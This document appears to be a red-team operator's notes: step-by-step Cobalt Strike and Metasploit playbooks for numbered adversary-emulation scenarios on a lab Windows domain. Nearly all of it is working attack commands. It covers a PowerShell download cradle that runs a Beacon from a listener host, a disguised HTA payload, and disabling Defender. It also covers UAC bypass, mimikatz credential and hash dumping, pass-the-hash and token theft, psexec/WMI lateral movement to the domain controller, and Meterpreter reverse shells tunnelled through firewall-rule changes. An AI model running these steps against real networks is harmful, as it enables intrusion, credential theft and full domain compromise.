Cobalt Strike


Remove old data
    rm /opt/Cobalt-Strike/data/*.bin

Start the team server
    cd /opt/Cobalt-Strike
    ./teamserver <IP> <password> <Malleable C2 profile> <kill date for Beacons>
    The first 2 parameters are required.

    ./teamserver 192.168.1.5 password /opt/Cobalt-Strike-profiles/APT/etumbot.profile
    Copy the SHA256 hash and send to other members on your team.

Login to the team server
    Right-click in the Terminal > Split Terminal Horizontally
    cd /opt/Cobalt-Strike
    ./cobaltstrike
    Host: 127.0.0.1
    Port: 50050
    User: neo
    Password: password
    Connect
    VerifyFingerprint (compare with the SHA256 hash) > Yes
------------------------------------------------------------------------------------------------------------------------------------------------------

Create an HTTP Listener
    Cobalt Strike > Listeners > Add
    Name: Initial access
    Payload: Beacon HTTP
    HTTP Hosts: click the plus sign > you should see your IP address > OK
    HTTP Port: 80
    Save > OK
------------------------------------------------------------------------------------------------------------------------------------------------------

Launch an attack to gain a foothold.

Disable Windows Defender on your Windows VM.
    Enterprise: Windows Security > Virus & threat protection > Manage settings > turn off Real-time protection > Yes
    Standard: Windows Defender

Attack 1
    Attacks > Web Drive-by > Scripted Web Delivery (S)
    URI Path: /a
    Local Host: (same IP as your server)
    Local Port: 80 (same port as your Listener)
    Listener: Initial access > Choose
    Type: powershell
    Check Use x64 payload
    Launch

    Copy the download cradle provided > OK
    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:80/a'))"

    Open a Command Prompt on your Windows VM and run the download cradle.
    Click on Cobalt Strike and you will see a Beacon session appear in the top pane.

Attack 2
    Attacks > Packages > HTML Application
    Listener: Initial access > Choose
    Method: Executable
    Generate
    /root/evil.hta
    Save > OK

    Attacks > Web Drive-by > Host File
    File: select the file that was just created > Open
    Local URI: /survey.txt
    Local Host: 192.168.1.5
    Local Port: 80
    Mime Type: automatic
    Launch > OK

    Open a web browser on your Wibndows VM to http://192.168.1.5/survey.txt
    Downloads > double-click on survey.hta
    Click on Cobalt Strike and you will see a Beacon session appear in the top pane.
------------------------------------------------------------------------------------------------------------------------------------------------------

Select the callback in the top pane > right-click > Interact
    sleep 0
    note foothold

Enumerate the target
    getuid
    shell ipconfig /all
    shell systeminfo
    ps

    drives
        shell dir E:
        shell type E:\secrets.txt

    shell net accounts
    shell net localgroup
    shell net localgroup Administrators
    shell arp -a

Escalate privileges
    powershell-import /opt/PowerSploit/Privesc/PowerUp.ps1
    powerpick Invoke-AllChecks

    powerpick Invoke-ServiceAbuse -Name 'crappy-serverice'
    spawnas john Password123! smb
    Select john in the top pane > right-click > Interact
    bypassuac http

    john should now be running in a high integrity Beacon (see asterisk)

Dump passwords
    logonpasswords
    menu View > Credentials

    ps
    Look for another user logged in and copy the PID of their process.
    inject <PID> <arch> <listener>
    inject 5678 x64 smb
    Select the new user in the top pane > right-click > Interact
------------------------------------------------------------------------------------------------------------------------------------------------------

Needs admin privs
    shell net view /domain                                         Find what domain you are on
    shell net localgroup Administrators /domain
    shell net group "Domain Computers" /domain                     List all computers joined to the domain
    wdigest                                                        See if there are any interesting credentials
    hashdump                                                       Dump the hashes

Misc
    shell nltest /dclist:<domain>                                  Locate the domain controller
------------------------------------------------------------------------------------------------------------------------------------------------------

Lateral Movement

Always use a FQDN instead of an IP.
If you have remote access to a VM, but can’t use psexec, reboot it and login as a domain user.

Domain users:
Get-DomainUser -Domain acme.com -DomainController 10.0.0.2 | findstr samaccountname
Domain admins:
Get-DomainGroupMember -identity "Domain Admins" -Domain acme.com -DomainController 10.0.0.2 | findstr MemberName
Shares that our current user is able to access:
Find-DomainShare -CheckShareAccess -Domain acme.com -DomainController 10.0.0.2
------------------------------------------------------------------------------------------------------------------------------------------------------

# Scenario 33

172.31.2.4	wkstn-02
172.31.2.70	wkuser-70
172.31.4.5	site-file
172.31.4.4	site-dc

Summary: Emulate lateral movement between one victim egress host and four other hosts, that uses SMB for lateral
movement, as well as follow-on victim to victim communications.

Controller domain: acme.org
Controller IP: x.x.x.x

ifconfig eth0 add x.x.x.x
cd /opt/Cobalt-Strike
rm data/*.bin
./teamserver 192.168.1.5 password /opt/Cobalt-Strike-profiles/APT/etumbot.profile

Using OS X, start Cobalt Strike and point to localhost.

Create http and smb listeners.
Launch an attack to gain a foothold.

Login to wkstn-02 as Administrator, open a command prompt, and paste in the PowerShell.
You should have an http Beacon on Cobalt Strike in about 10 sec.

Right-click on the new http Beacon > Interact
sleep 0                                                            Make the Beacon interactive
note foothold
ps                                                                 Look for another user logged in
inject <PID> <Arch> <listener>
inject 5678 x64 smb
Right-click on the new smb Beacon > Interact
hashdump                                                           Recover local account password hashes
logonpasswords                                                     Harvest credentials with mimikatz
View > Credentials

shell net view /domain                                             Show the domain
make_token site\administrator Simspace1!Simspace1!
shell net group "Domain Computers" /DOMAIN                         Show computers joined to the domain
shell nltest /dclist:SITE                                          Locate the domain controller
ls \\wkuser-70\C$                                                  Test remote access
psexec_psh wkuser-70 smb                                           You should have a new smb Beacon in about 10 sec

Right-click on the new smb Beacon > Interact
sleep 0
note 1st hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\site-file\C$
psexec_psh site-file smb

Right-click on the new http Beacon > Interact
sleep 0
note 2nd hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\site-dc\C$
psexec_psh site-dc smb	
	
Right-click on the new http Beacon > Interact
sleep 0
note 3rd hop
------------------------------------------------------------------------------------------------------------------------------------------------------

# Scenario 34

Host List: 172.31.2.67, 172.31.4.4, 172.31.2.1, 172.31.2.2, 172.31.2.3, 172.31.2.4, 172.31.2.5, 172.31.2.6

Summary: Emulate lateral movement between one victim egress host and the site domain controller, which
then laterally moves to five systems at once and exfiltrates data over a chain of SMB communications.

Controller Domain: acem.org
Controller IP: x.x.x.x

ifconfig eth0 add x.x.x.x
cd /opt/Cobalt-Strike
rm data/*.bin
./teamserver 192.168.1.5 password /opt/Cobalt-Strike-profiles/APT/etumbot.profile

Using OS X, start Cobalt Strike and point to localhost.

Create http and smb listeners.
Launch an attack to gain a foothold.

Login to wkuser-67 as Administrator, open a command prompt, and paste in the PowerShell.
You should have an http Beacon on Cobalt Strike in about 10 sec.
   
Right-click on the new http Beacon > Interact
sleep 0                                                            Make the Beacon interactive
note foothold
ps                                                                 Look for another user logged in
inject <PID> <Arch> <listener>
inject 5678 x64 smb
Right-click on the new smb Beacon > Interact
hashdump                                                           Recover local account password hashes
logonpasswords                                                     Harvest credentials with mimikatz
View > Credentials

shell net view /domain                                             Show the domain
make_token site\administrator Simspace1!Simspace1!
shell net group "Domain Computers" /DOMAIN                         Show computers joined to the domain
shell nltest /dclist:SITE                                          Locate the domain controller
ls \\wkstn-02\C$                                                   Test remote access
psexec_psh site-dc smb                                             You should have a new Beacon in about 10 sec

Right-click on the new smb Beacon > Interact
sleep 0
note first hop

View > Targets > Add
Address: 172.31.2.1
Name: wkstn-cdr
os: Windows 7
Save

Add
Address: 172.31.2.2
Name: wkstn-dco
os: Windows 7
Save

Add
Address: 172.31.2.3
Name: wkstn-01
os: Windows 7
Save

Add
Address: 172.31.2.4
Name: wkstn-02
os: Windows 7
Save

Add
Address: 172.31.2.5
Name: wkstn-03
os: Windows 7
Save

Right-click on 172.31.2.1 > Login > psexec
Listener: smb
Session: ... > first hop > Choose
Check Use session's current access token
Launch > Repeat on remaining targets.
------------------------------------------------------------------------------------------------------------------------------------------------------

# Scenario 37

Host List: 172.31.2.67, 172.31.2.4, 172.31.2.68, 172.31.4.4, 172.31.4.5, 172.31.2.72

Summary: Emulate SMB lateral movement between one victim egress host and a host, followed by a non-smb lateral
movement to a third host, which then uses SMB for lateral movement to a fourth, fifth, and sixth host.

Plan of attack: 
wkuser-67 - psexec > wkstn-02 - WMI > wkuser-68 - psexec > site-dc - psexec > site-file > wkuser-72

cd /opt/Cobalt-Strike
rm data/*.bin
./teamserver 192.168.1.5 password /opt/Cobalt-Sstrike-profiles/APT/etumbot.profile

Using OS X, start Cobalt Strike and point to localhost.

Create http and smb listeners.
Launch an attack to gain a foothold.

Login to wkuser-67 as Administrator, open a command prompt, and paste in the PowerShell.
You should have an http Beacon on Cobalt Strike in about 10 sec.

Right-click on the new http Beacon > Interact
sleep 0                                                            Make the Beacon interactive
note foothold
ps                                                                 Look for another user logged in
inject <PID> <Arch> <listener>
inject 5678 x64 smb
Right-click on the new smb Beacon > Interact
hashdump                                                           Recover local account password hashes
logonpasswords                                                     Harvest credentials with mimikatz
View > Credentials

shell net view /domain                                             Show the domain
make_token site\administrator Simspace1!Simspace1!
shell net group "Domain Computers" /DOMAIN                         Show computers joined to the domain
shell nltest /dclist:SITE                                          Locate the domain controller
ls \\wkstn-02\C$                                                   Test remote access
psexec_psh wkstn-02 http                                           You should have a new Beacon in about 10 sec

Right-click on the new http Beacon > Interact
sleep 0
note LM
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-68\C$
wmi wkuser-68 http

Right-click on the new Beacon > Interact
sleep 0
note 2nd LMps
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\site-dc\C$
psexec_psh site-dc smb

Right-click on the new Beacon > Interact
sleep 0
note 2nd LM - 1st hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\site-file\C$
psexec_psh site-file smb

Right-click on the new Beacon > Interact
sleep 0
note 2nd LM - 2nd hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-72\C$
psexec_psh wkuser-72 smb

Right-click on the new Beacon > Interact
sleep 0
note 2nd LM - 3rd hop
------------------------------------------------------------------------------------------------------------------------------------------------------

# Scenario 40

172.31.2.4	wkstn-02
172.31.2.66	wkuser-66
172.31.2.3	wkstn-01
172.31.2.67	wkuser-67
172.31.2.5	wkstn-03
172.31.2.68	wkuser-68
172.31.2.6	wkstn-04
172.31.2.69	wkuser-69
172.31.4.4	site-dc
172.31.2.70	wkuser-70

cd /opt/Cobalt-Strike
rm data/*.bin
./teamserver 192.168.1.5 password /opt/Cobalt-Strike-profiles/APT/etumbot.profile

Using OS X, start Cobalt Strike and point to localhost.

Create http and smb listeners.
Launch an attack to gain a foothold.

Login to wkstn-02 as Administrator, open a command prompt, and paste in the PowerShell.
You should have an HTTP Beacon on Cobalt Strike in about 10 sec.

Right-click on the new HTTP Beacon > Interact
sleep 0                                                            Make the Beacon interactive
note foothold
ps                                                                 Look for another user logged in
    inject <PID> <Arch> <listener>
    inject 5678 x64 smb
    Right-click on the new smb Beacon > Interact
hashdump                                                           Recover local account password hashes
logonpasswords                                                     Harvest credentials with mimikatz
View > Credentials

shell net view /domain                                             Show the domain
make_token site\administrator Simspace1!Simspace1!
shell net group "Domain Computers" /DOMAIN                         Show computers joined to the domain
shell nltest /dclist:SITE                                          Locate the domain controller
ls \\wkuser-66\C$                                                  Test remote connectivity
psexec_psh wkuser-66 smb                                           You should have a new Beacon in about 10 sec

Right-click on the new smb Beacon > Interact
sleep 0
note 1st hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkstn-01\C$	
psexec_psh wkstn-01 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 2nd hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-67\C$
psexec_psh wkuser-67 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 3rd hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkstn-03\C$	
psexec_psh wkstn-03 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 4th hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-68\C$
psexec_psh wkuser-68 smb
Right-click on the new smb Beacon > Interact
sleep 0
note 5th hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkstn-04\C$	
psexec_psh wkstn-04 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 6th hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-69\C$
psexec_psh wkuser-69 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 7th hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\site-dc\C$
psexec_psh site-dc smb	

Right-click on the new smb Beacon > Interact
sleep 0
note 8th hop
ps
hashdump
logonpasswords
make_token site\administrator Simspace1!Simspace1!
ls \\wkuser-70\C$
psexec_psh wkuser-70 smb

Right-click on the new smb Beacon > Interact
sleep 0
note 9th hop
------------------------------------------------------------------------------------------------------------------------------------------------------

# Other notes

# Catch the callback from wkstn-04
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 200.200.200.80
set lport 443
run
migrate -N explorer.exe

# Make tunnels for wkuser-66
upload fpipeknockoff.windows.amd64.exe s:\\
shell
netsh advfirewall firewall delete rule  name="fpipeknockoff" program="\\site-file\share\fpipeknockoff.windows.amd64.exe" & netsh advfirewall firewall add rule name="fpipeknockoff" dir=in action=allow program="\\site-file\share\fpipeknockoff.windows.amd64.exe" enable=yes & \\site-file\share\fpipeknockoff.windows.amd64.exe -c 200.200.200.80:443 <NUL >NUL 2>NUL & exit
run post/multi/manage/autoroute CMD=add netmask=/32 subnet=172.31.2.66
background

# Make connection to wkuser-66
use exploit/windows/smb/psexec_psh
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.31.2.66
set service_name kittens
set smbdomain site
set smbpass Simspace1!Simspace1!
set smbuser administrator
set lhost 172.31.2.6
set lport 4444
set ReverseListenerBindAddress 0.0.0.0
set ReverseListenerBindPort 443
run
migrate -N svchost.exe

# Make tunnels for site-mail
shell
netsh advfirewall firewall delete rule name="fpipeknockoff" program="\\site-file\share\fpipeknockoff.windows.amd64.exe" & netsh advfirewall firewall add rule name="fpipeknockoff" dir=in action=allow program="\\site-file\share\fpipeknockoff.windows.amd64.exe" enable=yes & \\site-file\share\fpipeknockoff.windows.amd64.exe -c 172.31.2.6:4444 & exit
run post/multi/manage/autoroute CMD=add netmask=/32 subnet=172.31.4.9
background

# Make connection to site-mail
use exploit/windows/smb/psexec_psh
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.31.4.9
set service_name kittens
set smbdomain site
set smbpass Simspace1!Simspace1!
set smbuser administrator
set lhost 172.31.2.66
set lport 4444
set ReverseListenerBindAddress 0.0.0.0
set ReverseListenerBindPort 443
run
migrate -N svchost.exe

# Make tunnels to wkuser-72
shell
netsh advfirewall firewall delete rule  name="fpipeknockoff" program="\\site-file\share\fpipeknockoff.windows.amd64.exe" & netsh advfirewall firewall add rule name="fpipeknockoff" dir=in action=allow program="\\site-file\share\fpipeknockoff.windows.amd64.exe" enable=yes & \\site-file\share\fpipeknockoff.windows.amd64.exe -c 172.31.2.66:4444 & exit
run post/multi/manage/autoroute CMD=add netmask=/32 subnet=172.31.2.72
background

# Make connection to wkuser-72
use exploit/windows/smb/psexec_psh
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.31.2.72
set service_name kittens
set smbdomain site
set smbpass Simspace1!Simspace1!
set smbuser administrator
set lhost 172.31.4.9
set lport 4444
set ReverseListenerBindAddress 0.0.0.0
set ReverseListenerBindPort 443
run
migrate -N svchost.exe
------------------------------------------------------------------------------------------------------------------------------------------------------

Create HTTP and smb listeners.
Launch an attack to gain a foothold.

Right-click on the new HTTP Beacon > Interact
sleep 0
shell whoami /groups                                               Part of the Administrators group
    Running in a medium integrity context
    Need to elevate our privileges
bypassuac smb                                                      Now running in a high integrity context (see the asterisks)

Right-click on the new SMB Beacon > Interact
sleep 0
ps                                                                 Look for another user logged in
inject <PID> <Arch> <listener>
inject 4820 x64 smb

Right-click on the new SMB Beacon > Interact
sleep 0
hashdump
logonpasswords
View > Credentials

shell net view /domain                                             Show the domain
shell nltest /dclist:CORP                                          Locate the domain controller
shell net group "Domain Computers" /DOMAIN                         Show computers joined to the domain

ls \\target2\C$                                                    Test remote access. Access is denied
    Scroll up and copy the admin hash
pth Administrator <LM hash>:<NTLM hash> powershell -w hidden

steal_token <NTLM PID>
ls \\target2\C$
    See if you have trust to the next target
    If so, lateral move using WMI
wmi target2 smb
rev2self                                                           Drop the current token

powershell-import /opt/PowerSploit/Recon/PowerView.ps1
powerpick Find-LocalAdminAccess

psexec fileserver ADMIN$ smb

Right-click on the new SMB Beacon > Interact
sleep 0
note fileserver
ps                                                                 A domain admin is logged on
steal_token <PID>
psexec dc SYSVOL smb

